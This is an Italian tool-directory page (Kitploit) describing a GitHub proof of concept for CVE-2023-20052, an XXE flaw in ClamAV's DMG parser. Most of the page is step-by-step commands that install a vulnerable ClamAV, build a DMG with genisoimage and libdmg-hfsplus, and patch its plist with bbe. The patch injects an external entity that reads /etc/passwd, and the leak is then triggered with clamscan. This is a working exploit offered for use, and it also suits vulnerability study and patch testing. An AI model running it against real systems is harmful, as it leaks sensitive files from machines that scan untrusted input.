Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-20052 — CVE-2023-20052 vulnerabilità di fuga di informazioni nel parser di file DMG di ClamAV | Kitploit
Strumenti/GitHubGitHub/cy83rr0h1t/cve-2023-20052
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniAnalisi Malware
GitHubcy83rr0h1t/cve-2023-20052

CVE-2023-20052

CVE-2023-20052 vulnerabilità di fuga di informazioni nel parser di file DMG di ClamAV

Vedi Repository
12 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2023-20052

Vulnerabilità di fuga di informazioni CVE-2023-20052 nel parser di file DMG di ClamAV
Una vulnerabilità nel parser di file DMG di ClamAV versioni 1.0.0 e precedenti, 0.105.1 e precedenti, e 0.103.7 e precedenti potrebbe consentire a un attaccante remoto non autenticato di accedere a informazioni sensibili su un dispositivo interessato. Questa vulnerabilità è dovuta all'abilitazione della sostituzione delle entità XML, che può provocare un'iniezione di entità esterne XML. Un attaccante potrebbe sfruttare questa vulnerabilità inviando un file DMG appositamente predisposto per essere analizzato da ClamAV su un dispositivo interessato. Uno sfruttamento riuscito potrebbe consentire all'attaccante di far trapelare byte da qualsiasi file che possa essere letto dal processo di scansione di ClamAV.

Testato su Ubuntu 20.04

Come installare ClamAV versione 1.0.0

  • https://github.com/Cisco-Talos/clamav/releases/download/clamav-1.0.0/clamav-1.0.0.linux.i686.deb
  • https://github.com/Cisco-Talos/clamav/releases/download/clamav-1.0.0/clamav-1.0.0.linux.x86_64.deb

sudo dpkg -i package-name.deb
1

  • sudo apt install -f

  • mkdir /usr/local/share/clamav

  • mv /usr/local/etc/freshclam.conf.sample /usr/local/etc/freshclam.conf
    2

  • sudo adduser clamav
    3

  • sudo chown -R 1002:1003 /usr/local/share/clamav

  • sudo freshclam
    4

5

  • clamscan --version
    6

Installazione di altre cose necessarie per questo exploit.

  • apt-get update

  • apt-get install -y ca-certificates gnupg wget

  • echo "deb http://archive.debian.org/debian-security stretch/updates main" >> /etc/apt/sources.list

  • wget -q -O - https://ftp-master.debian.org/keys/archive-key-9-security.asc | apt-key add -

  • apt-get update -y

  • sudo apt install -y libssl1.0-dev gcc g++ cmake zlib1g-dev genisoimage bbe git hfsplus
    7

  • git clone https://github.com/planetbeing/libdmg-hfsplus.git
    8

  • cd /libdmg-hfsplus

  • cmake .
    9

  • make
    10

  • cp dmg/dmg /bin
    sudo genisoimage -D -V "exploit" -no-pad -r -apple -file-mode 0777 -o test.img . && dmg dmg test.img test.dmg
    11

bbe -e 's|<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">|<!DOCTYPE plist [<!ENTITY xxe SYSTEM "/etc/passwd"> ]>|' -e 's/blkx/&xxe\;/' test.dmg -o exploit2.dmg 12

  • clamscan --debug exploit2.dmg 13

Riferimento: https://github.com/nokn0wthing/CVE-2023-20052

Scarica lo strumento